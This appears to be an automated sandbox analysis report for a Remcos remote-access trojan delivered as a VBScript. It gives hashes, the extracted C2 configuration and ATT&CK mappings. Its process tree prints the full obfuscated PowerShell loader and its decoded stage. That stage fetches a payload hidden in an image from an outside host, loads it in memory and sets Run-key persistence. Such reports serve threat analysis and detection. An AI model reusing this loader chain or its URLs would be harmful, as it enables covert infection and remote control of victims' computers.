remcos | 0bede06c4b670f1dff945866768c643ece0db8618cf042ffeeda9d88aad09880

General

Target

envifa.vbs
Size

151KB
MD5

64782d163bcd2fbbbf72bf768a4b57a4
SHA1

9feca15cae48fb30fc12cc241243e5294cf3b79f
SHA256

0bede06c4b670f1dff945866768c643ece0db8618cf042ffeeda9d88aad09880
SHA512

7c7b0c74fff9b480fd61b80903b8a8ed9a1124229e0922e286eb82146b630ecb95cc6b80fb24c72d72eed978dc1f6998e1d4f01f7806137b153692db17d0e033
SSDEEP

1536:sp9p9p9p9p9p9p9pu20WwCqPv3+NhlV9p9p9p9p9p9p9p9p5MTp9p9p9p9p9p9pL:d

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/686/431/original/dll_vbe.jpg?1702073941

exe.dropper

https://uploaddeimagens.com.br/images/004/686/431/original/dll_vbe.jpg?1702073941

Extracted

Family

remcos

Botnet

RemoteHost

C2

remccoss2023.duckdns.org:4576

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
registros.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-E5ZBB0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Capturas de pantalla
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

11 1688 powershell.exe
30 1688 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation WScript.exe

flow	pid	process
11	1688	powershell.exe
30	1688	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2598572287-1024438387-935107970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\google.vbe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1688 set thread context of 2928 1688 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1532 powershell.exe
1532 powershell.exe
1688 powershell.exe
1688 powershell.exe
2640 powershell.exe
2640 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1532 powershell.exe
Token: SeDebugPrivilege 1688 powershell.exe
Token: SeDebugPrivilege 2640 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

RegAsm.exe

pid process

2928 RegAsm.exe

description	pid	process	target process
PID 1688 set thread context of 2928	1688	powershell.exe	RegAsm.exe

pid	process
1532	powershell.exe
1532	powershell.exe
1688	powershell.exe
1688	powershell.exe
2640	powershell.exe
2640	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	2640	powershell.exe

pid	process
2928	RegAsm.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 632 wrote to memory of 1532	632	WScript.exe	powershell.exe
PID 632 wrote to memory of 1532	632	WScript.exe	powershell.exe
PID 1532 wrote to memory of 1688	1532	powershell.exe	powershell.exe
PID 1532 wrote to memory of 1688	1532	powershell.exe	powershell.exe
PID 1688 wrote to memory of 2640	1688	powershell.exe	powershell.exe
PID 1688 wrote to memory of 2640	1688	powershell.exe	powershell.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe
PID 1688 wrote to memory of 2928	1688	powershell.exe	RegAsm.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVQByDgTreGwDgTreIDgTreDgTre9DgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre2DgTreDgDgTreNgDgTrevDgTreDQDgTreMwDgTrexDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTreZDgTreBsDgTreGwDgTreXwB2DgTreGIDgTreZQDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre3DgTreDDgTreDgTreMgDgTrewDgTreDcDgTreMwDgTre5DgTreDQDgTreMQDgTrenDgTreDsDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreCQDgTredwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreLgBEDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreRDgTreBhDgTreHQDgTreYQDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFUDgTrecgBsDgTreCkDgTreOwDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBSDgTreGUDgTreZgBsDgTreGUDgTreYwB0DgTreGkDgTrebwBuDgTreC4DgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreF0DgTreOgDgTre6DgTreEwDgTrebwBhDgTreGQDgTreKDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBDDgTreGwDgTreYQBzDgTreHMDgTreTDgTreBpDgTreGIDgTrecgBhDgTreHIDgTreeQDgTrezDgTreC4DgTreQwBsDgTreGEDgTrecwBzDgTreDEDgTreJwDgTrepDgTreDsDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreUgB1DgTreG4DgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTreJgBiDgTreDIDgTreMDgTreDgTrewDgTreDkDgTreMDgTreBkDgTreDcDgTreMwBjDgTreDgDgTreZDgTreBkDgTreGYDgTreMwDgTre4DgTreDkDgTreZDgTreBiDgTreGMDgTreNgDgTrexDgTreDQDgTreMwDgTre5DgTreDIDgTreYQDgTrezDgTreGIDgTreMDgTreDgTre5DgTreGYDgTreYQBhDgTreDQDgTreNQDgTrexDgTreDQDgTreZgDgTreyDgTreGYDgTreNgDgTre1DgTreDIDgTreMDgTreDgTre1DgTreGIDgTreNgBkDgTreGEDgTreOQBlDgTreDEDgTreMDgTreDgTre3DgTreDcDgTreYwDgTrewDgTreDcDgTreNwDgTreyDgTreGIDgTreNQBlDgTreD0DgTrebQBoDgTreCYDgTreMQDgTrezDgTreDcDgTreMwDgTre3DgTreDcDgTreNQDgTre2DgTreD0DgTrecwBpDgTreCYDgTreMQDgTrezDgTreGMDgTreYQDgTre5DgTreDgDgTreNQDgTre2DgTreD0DgTreeDgTreBlDgTreD8DgTredDgTreB4DgTreHQDgTreLgBpDgTreGkDgTreaQBpDgTreHMDgTrecwBvDgTreGMDgTrebQBlDgTreHIDgTreLwDgTrewDgTreDMDgTreNwDgTrezDgTreDIDgTreNDgTreDgTre2DgTreDMDgTreMgDgTre1DgTreDMDgTreOQDgTre1DgTreDDgTreDgTreODgTreDgTrezDgTreDgDgTreMQDgTrexDgTreC8DgTreNQDgTrezDgTreDkDgTreNDgTreDgTre0DgTreDQDgTreNwDgTrezDgTreDMDgTreMgDgTre3DgTreDYDgTreNQDgTrewDgTreDgDgTreMwDgTre4DgTreDEDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDIDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGcDgTrebwBvDgTreGcDgTrebDgTreBlDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTre0DgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCwDgTreIDgTreDgTrenDgTreGcDgTrebwBvDgTreGcDgTrebDgTreBlDgTreCcDgTreKQDgTrepDgTreDgTre==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/686/431/original/dll_vbe.jpg?1702073941';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('ClassLibrary3.Class1');$method = $type.GetMethod('Run').Invoke($null, [object[]] ('&b20090d73c8ddf389dbc614392a3b09faa4514f2f65205b6da9e1077c0772b5e=mh&13737756=si&13ca9856=xe?txt.iiiissocmer/0373246325395083811/5394447332765083811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '' , '2' , 'google' , '4' , 'C:\ProgramData\', 'google'))"
3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbe -Destination C:\ProgramData\google.vbe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:2928

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\registros.dat

Filesize
144B

MD5
fdda66f01f0eba37d310b8ae929dcbd4

SHA1
a653bc3754820f5e79cdaeb2bb3376553e3dd496

SHA256
1817421af0a681386bc7f36c017cd5d5162d47892178b510765a7779957475f0

SHA512
001d08ed01bb74460d867a81fd7ffeab984eaf83aa7734b79a2d6b7868f4f430f282531d8850c1cfb533ac51ba263a2da0264289a81df1989f94377caa88d648

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7d5d8cf9f65ce79e552409c240295219

SHA1
ec5e938110638dcd176ce0645682a0d3949dd5a8

SHA256
817d6bfa16b959aae0dec64568ec6d98fdd61a205c61dde60551e192e5478596

SHA512
0d06c42b9c5648311000eefe9bd5a952dafd999b5c7ab17dbbebb6c6d9cd4b1de451e13ef0af72dfa3557aee8cb8bb5521642db843c3f61dfd701dd6c95afb68

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ot2htzv.ajn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1532-50-0x00007FF8389D0000-0x00007FF839491000-memory.dmp

Filesize
10.8MB

Download
memory/1532-12-0x00000135B6B70000-0x00000135B6B80000-memory.dmp

Filesize
64KB

Download
memory/1532-10-0x00007FF8389D0000-0x00007FF839491000-memory.dmp

Filesize
10.8MB

Download
memory/1532-0-0x00000135B6A60000-0x00000135B6A82000-memory.dmp

Filesize
136KB

Download
memory/1532-11-0x00000135B6B70000-0x00000135B6B80000-memory.dmp

Filesize
64KB

Download
memory/1688-42-0x000001D1CAC20000-0x000001D1CAC28000-memory.dmp

Filesize
32KB

Download
memory/1688-23-0x000001D1C9D60000-0x000001D1C9D70000-memory.dmp

Filesize
64KB

Download
memory/1688-24-0x000001D1C9D60000-0x000001D1C9D70000-memory.dmp

Filesize
64KB

Download
memory/1688-13-0x00007FF8389D0000-0x00007FF839491000-memory.dmp

Filesize
10.8MB

Download
memory/1688-47-0x00007FF8389D0000-0x00007FF839491000-memory.dmp

Filesize
10.8MB

Download
memory/1688-26-0x000001D1CAB30000-0x000001D1CAB3A000-memory.dmp

Filesize
40KB

Download
memory/1688-25-0x000001D1C9D60000-0x000001D1C9D70000-memory.dmp

Filesize
64KB

Download
memory/2640-37-0x0000016B40A00000-0x0000016B40A10000-memory.dmp

Filesize
64KB

Download
memory/2640-38-0x0000016B40A00000-0x0000016B40A10000-memory.dmp

Filesize
64KB

Download
memory/2640-41-0x00007FF8389D0000-0x00007FF839491000-memory.dmp

Filesize
10.8MB

Download
memory/2640-27-0x00007FF8389D0000-0x00007FF839491000-memory.dmp

Filesize
10.8MB

Download
memory/2928-57-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-43-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-54-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-55-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-51-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-58-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-59-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-64-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-65-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-52-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-70-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-71-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-77-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-78-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-83-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-89-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-96-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2928-97-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads